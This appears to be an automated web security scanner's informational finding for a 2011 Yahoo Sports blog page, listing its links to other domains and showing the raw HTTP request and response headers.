<a href="http://sports.yahoo.com/mlb/recap?gid=310905114&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Red Sox lose Beckett, fall to Jays in 11">
<img src="http://l.yimg.com/iu/api/res/1.2/w9xkk_1GG5CupyMTSRVjNg--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/b2/fullj.5b15e818a420c2837e316fcc4a52b935/ap-201109051659611587164.jpg" title="Red Sox lose Beckett, fall to Jays in 11" alt="Red Sox lose Beckett, fall to Jays in 11" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=ap-usopen-swilliams&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Serena returns to US Open quarterfinals">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-saints-paytoncontract&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Saints extend Payton's pact through 2015">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-tressel&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Colts won't use Tressel until 7th game">
<img src="http://l.yimg.com/iu/api/res/1.2/epQ7u_cPMi6S7AW3a2gcuw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1314999103.jpg" title="Colts won't use Tressel until 7th game" alt="Colts won't use Tressel until 7th game" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-manning&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Tough news for Peyton">
<img src="http://l.yimg.com/iu/api/res/1.2/4gYbQm9TOj0foLKTK6kJxw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314681169.jpg" title="Tough news for Peyton" alt="Tough news for Peyton" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/pga/news?slug=ap-deutschebank&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Workers get Deutsche ready after Irene">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
"http://sports.yahoo.com/nfl/news?slug=jc-cole_peyton_manning_colts_lockout090511&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Troubling health news for Peyton Manning">
<img src="http://l.yimg.com/iu/api/res/1.2/Dx8ad3BF8vfI6ktnGQZ2Pw--/YXBwaWQ9eXZpZGVvO2NoPTEyMDtjcj0xO2N3PTE4MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315252981.jpg" title="Troubling health news for Peyton Manning" alt="Troubling health news for Peyton Manning" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-buddyryan-cancer&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cancer won't stop Ryan">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oo.com/nfl/blog/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/big_league_stew/post/Jerome-Williams-The-Giants-called-me-8216-Jer?urn=mlb-wp18625&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="MLB player called wrong name for years">
<img src="http://l.yimg.com/iu/api/res/1.2/bL85hQglN3ttKnNb7aMbGA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/williams-pd.jpg" title="MLB player called wrong name for years" alt="MLB player called wrong name for years" width="94" height="63">
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Blue-Jays-scout-Japan-8217-s-Yu-Darvish-Is-he-?urn=mlb-wp18464&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Japanese pitching phenom">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/news?slug=jp-passan_10_degrees_mvp_candidates_090411&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Comparing potential MVPs">
<img src="http://l.yimg.com/iu/api/res/1.2/.VekwHIL.XxGYmrIR79ckQ--/YXBwaWQ9eXZpZGVvO2NoPTE2MDtjcj0xO2N3PTI0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315203022.jpg" title="Comparing potential MVPs" alt="Comparing potential MVPs" width="94" height="63">
</a>
...[SNIP]...
blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tiki Barber jobless, reportedly devastated">
<img src="http://l.yimg.com/iu/api/res/1.2/1oPJxkXQ7D4.tkngpU_dwg--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tiki-pd.jpg" title="Tiki Barber jobless, reportedly devastated" alt="Tiki Barber jobless, reportedly devastated" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-manning&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tough news for Peyton">
<img src="http://l.yimg.com/iu/api/res/1.2/4gYbQm9TOj0foLKTK6kJxw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314681169.jpg" title="Tough news for Peyton" alt="Tough news for Peyton" width="94" height="63">
</a>
...[SNIP]...
utdown_corner/post/Colts-delay-Tressel-8217-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Jim Tressel punished by his new NFL boss">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Jim Tressel punished by his new NFL boss" alt="Jim Tressel punished by his new NFL boss" width="94" height="63">
</a>
...[SNIP]...
ahoo.com/mlb/blog/big_league_stew/post/Pitcher-Milone-hits-home-run-on-first-pitch-he-s?urn=mlb-wp18507&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rookie's rare feat">
<img src="http://l.yimg.com/iu/api/res/1.2/jpYINf57Jv1vBnQgFernXw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/troop-pd.jpg" title="Rookie's rare feat" alt="Rookie's rare feat" width="94" height="63">
</a>
...[SNIP]...
o.com/mlb/blog/big_league_stew/post/Umpire-West-goes-rogue-on-replay-in-Phillies-Mar?urn=mlb-wp18578&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Umpire's strange call">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Brewers-backup-catcher-George-Kottaras-hits-firs?urn=mlb-wp18532&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Catcher hits for cycle">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=ap-nascar-atlanta&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NASCAR hopes bad weather gone by Tuesday">
<img src="http://l.yimg.com/iu/api/res/1.2/fY0ArNmEgARdXgW3VFOLkw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/crash1.jpg" title="NASCAR hopes bad weather gone by Tuesday" alt="NASCAR hopes bad weather gone by Tuesday" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nascar/news?slug=txnascarnationwide&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Edwards recovers, wins">
<img src="http://l.yimg.com/iu/api/res/1.2/KLKYfKOxh3ZdcnMCT15hfw--/YXBwaWQ9eXZpZGVvO2NoPTQyNTtjcj0xO2N3PTYzNDtkeD0xNDtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/getty/b1/fullj.74236e574d6a4f7fa42887a424e4ecaf/74236e574d6a4f7fa42887a424e4ecaf-getty-107745401js007_11th_annual_.jpg" title="Edwards recovers, wins" alt="Edwards recovers, wins" width="94" height="63">
</a>
...[SNIP]...
post/Rafael-Nadal-collapses-at-post-match-press-confe?urn=ten-wp2948&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rafael Nadal collapses at post-match press conference">
<img src="http://l.yimg.com/iu/api/res/1.2/p8QNXBH2ur9RxK3SSsdbug--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/nadal.jpg" title="Rafael Nadal collapses at post-match press conference" alt="Rafael Nadal collapses at post-match press conference" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_venuswilliams_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Venus thanks fans">
<img src="http://l.yimg.com/iu/api/res/1.2/SGDXAA_VYFh5N_Ix_DfK.g--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.e6fc1b4cfaefc628237dd6812cc3d4a6/0.jpg" title="Venus thanks fans" alt="Venus thanks fans" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=afp-tennis_usa_open_men_20110904&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Nadal in field of 16">
<img src="http://l.yimg.com/iu/api/res/1.2/rk8mzTCWVKirKboIUyXTDg--/YXBwaWQ9eXZpZGVvO2NoPTE2NDtjcj0xO2N3PTI0NTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ac/cf/fullj.d830959be5676770fcf36656ad0b01f5/0.jpg" title="Nadal in field of 16" alt="Nadal in field of 16" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/ten/news?slug=ap-usopen-roddick&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Roddick looks strong">
<img src="http://l.yimg.com/iu/api/res/1.2/hTuM.plFCT5s1M65gp6zww--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314857213.jpg" title="Roddick looks strong" alt="Roddick looks strong" width="94" height="63">
</a>
...[SNIP]...
log/shutdown_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110904_nfc_free_agent_moves_by_team_2&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Free agent moves">
<img src="http://l.yimg.com/iu/api/res/1.2/DO19w.oidtwvdIr1uvR..w--/YXBwaWQ9eXZpZGVvO2NoPTIzMDtjcj0xO2N3PTM0MztkeD0zOTtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/pfw/72/fullj.d31be56e39031f27aa6903d7c8ccdb0b/20110904_nfc_free_agent_moves_0.jpg" title="Free agent moves" alt="Free agent moves" width="94" height="63">
</a>
...[SNIP]...
ttp://sports.yahoo.com/nfl/news?slug=nfp-20110904_mark_herzlich_beats_the_odds_makes_giants_roster&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Herzlich beats the odds">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-leeroyselmon&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Selmon is improving">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds-semenya&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="South African runner's valiant return">
<img src="http://l.yimg.com/iu/api/res/1.2/1J1FJn2FsGUNJqTveVRpJQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/semenya.jpg" title="South African runner's valiant return" alt="South African runner's valiant return" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Bolt, Jamaica take gold">
<img src="http://l.yimg.com/iu/api/res/1.2/97klez0UFQMbKD7UV7d0.Q--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/e5/fullj.7d1639ed4877ae02a0cee5b1991a05fe/ap-201109020839311726658.jpg" title="Bolt, Jamaica take gold" alt="Bolt, Jamaica take gold" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/olympics/news?slug=ap-2020bids&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Six bid for 2020 Olympics">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=reu-worldmentriple_jump_pix&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="American pulls upset">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/blog/big_league_stew/post/Wedgie-Foul-ball-sticks-in-mask-of-Mariners-cat?urn=mlb-wp18471&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Foul ball's funny landing place">
<img src="http://l.yimg.com/iu/api/res/1.2/L_C_0HS.bC_7fqRT3udDuw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/stuck.jpg" title="Foul ball's funny landing place" alt="Foul ball's funny landing place" width="94" height="63">
</a>
...[SNIP]...
<h5><a href="http://www.talkingchop.com/"><img src="http://l.yimg.com/a/p/sp/editorial_image/15/155103eee349f90cb0b0d43b06f1df38/mlbatl.gif" alt="SB Nation" />Talking Chop</a>
...[SNIP]...
<li><a href="http://www.talkingchop.com/2011/9/6/2407520/tomahawk-chops-daily-atlanta-braves-news-clippings-for-tuesday?ref=yahoo" class="sbnation">Tomahawk Chops: Daily Atlanta Braves News Clippings For Tuesday, September 6th</a>
...[SNIP]...
<li><a href="http://www.talkingchop.com/2011/9/6/2407218/terdoslavich-makes-history-as-the-atlanta-braves-minor-league-season?ref=yahoo" class="sbnation">Terdoslavich Makes History As The Atlanta Braves Minor League Season Ends</a>
...[SNIP]...
<li class="merch"><a href="http://yahoosports.teamfanshop.com/MLB_Baseball_Atlanta_Braves">Atlanta Braves Merchandise</a>
...[SNIP]...
<li class="ticket"><a href="http://seatgeek.com/atlanta-braves-tickets/?aid=14&rid=2" class="ticket">Tickets</a>
...[SNIP]...
<h5><a href="http://www.thegoodphight.com/"><img src="http://l.yimg.com/a/p/sp/editorial_image/86/86633f9689eb14de833a009c707fc3d5/mlbphi.gif" alt="SB Nation" />The Good Phight</a>
...[SNIP]...
<li><a href="http://www.thegoodphight.com/2011/9/6/2407460/some-tuesday-phillies-links-for-you-september-6-2011-cupcake-joe?ref=yahoo" class="sbnation">Some Tuesday Phillies Links for You, September 6, 2011: Cupcake Joe - ACTIVATE!</a>
...[SNIP]...
<li><a href="http://www.thegoodphight.com/2011/9/5/2407020/cliff-lee-is-good-phillies-9-braves-0?ref=yahoo" class="sbnation">Cliff Lee is Good: Phillies 9, Braves 0</a>
...[SNIP]...
<li class="merch"><a href="http://yahoosports.teamfanshop.com/MLB_Baseball_Philadelphia_Phillies">Philadelphia Phillies Merchandise</a>
...[SNIP]...
<li class="ticket"><a href="http://seatgeek.com/philadelphia-phillies-tickets/?aid=14&rid=2" class="ticket">Tickets</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/blog/big_league_stew/post/Umpire-West-goes-rogue-on-replay-in-Phillies-Mar?urn=mlb-wp18578" title="Umpire West goes rogue on replay in Phillies-Marlins game"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315235799.jpg" class="thumb" /></a>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
IPE5nMaBQTmYXCQNZMhd7ak5mFwsACfgp/B=ezixMEoGYvY-/J=1315313419813817/K=pywGN4.njdLouHcchC7aSQ/A=6425739/R=2/id=noscript/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/mip/061711_sports_fantasyfootball11_300x125.jpg" width="300" height="125" border="0"></a>
...[SNIP]...
<div id="ad-745217" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
</div>


<iframe src="http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html" width=1 height=2 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no style="display:block;height:0;"></iframe>
</div>
</div>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r176591;js/video/dash-players/dash-players-init.r174877.js?m"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1286hmg4h(gid$dddWQ2KIPE5nMaBQTmYXCQNZMhd7ak5mFwsACfgp,st$1315313419773956,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.98. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r3.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 290067

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Yahoo! Sports - National Football League News" href="/nfl/rss.xml">

<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJx1j-FuhCAQhJ9IBQ8R0ochFPZ6JMqaXWzj21fFJueP_loyfLszE5i7bU1d39pWdAQMpXliLtx8UYrckhxHo_VH2DlOBX5SBJf9t3uBj0DuiViAdsxIpcaKLUiFq2QepxRwnjF3n55h14dxGC4UPIWX88yJSzennOrT9UJYYXoh9cMcG1rL_v3SxkszY_ybp5m25j8kBcy3jBezTH4DynuFs6ky4pY3Jg4T8kpnaiWNff8NnnBlmI5NbW3Ndzjxzap6uFr1Cqp-ARhQf5A,.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxtUOlugzAMfqJ1hOYA7WGiNDEQLQeKQzvefiFUAqb9svSdtjXi5wAqLwmMfLg44i2RjjTN_UsXCn5mSHnD6L1tScWm6EE6UAZzTKt8u6uv6Xl_aHw0i9sJwsQeqKP3MZSxhGziKxRScCb25BI6LiBRT7A5L62DClnhegmlVJx8tRNn0Haw-qQTXcO7qntaA_GC5KT0N6RLmtJyKtc5G_7UoI4J8mTDVR7wBQnlQ5kRJLnRrUAIyirr1_M5x4Pef1hx_iib1nn8uiOEs_9kYXCF5qRn7S-GjZe9.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxVkGuOwyAMhE_UPIEQ9TCRQ5wWieIKk-329suj0qa_kPzNMGMb5vZ92HZo5qZrAzLGy04-8uUW7MZN6KdJK3U1SWfo8SDfrsCY5nKScirzf79JTrAeQ_HNw1j46ui24G_E4MEtd4StCtQo6gdsI77shouHnw9fdqJYZLoXH9nTwTsRRgjmXoiaRSE7QjwCbkuO4oK6bjyXzg-mtRIT4zD0ZxaJ3Ao5S8l-rDYI0RqHX_n589xbT2I--2svn_qWewn9Hb1ZNo449ctXE72uZiZj0znWI0by2Si1ErXXi6Ds12kt_wDHPo2P.css?z&m" />
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/j/assets/eJx1kO2KwyAQRZ8oSZP6SR9GrJm0gjrFMV3y9qspyyaw-0s491wujiMattUPU6_7y5CBoHQLpkLdI_uZ-jxKqYS4ueo5jBHTcLcElXPJuTxyZzOuBKF1hNbTMfvyc-uw6zSNR77Rq4s4_7xVUaPQ6j-lgI27w5j8y0lLWxej5p_1J0YwNVgD0N7j8vobBLAzFcybWcCWNX-cixZ6d7zDRKc18gXaT0yyb_OsbchmQSyQT5rNxbsAJ3YP-GiHUZLp2yv7VMwBM6mY-gYK3IZE.css?z&m" />
<script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Tiki Barber remains unemployed and sad" />
<link rel="image_src" href="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nfl/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/media/phugc/mwphcom_r141.css&d/lib/yui/2.9.0/build/container/assets/skins/sam/container.css&d/lib/yui/2.9.0/build/fonts/fonts-min.css&d/lib/yui/2.9.0/build/reset/reset-min.css" />
</head>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

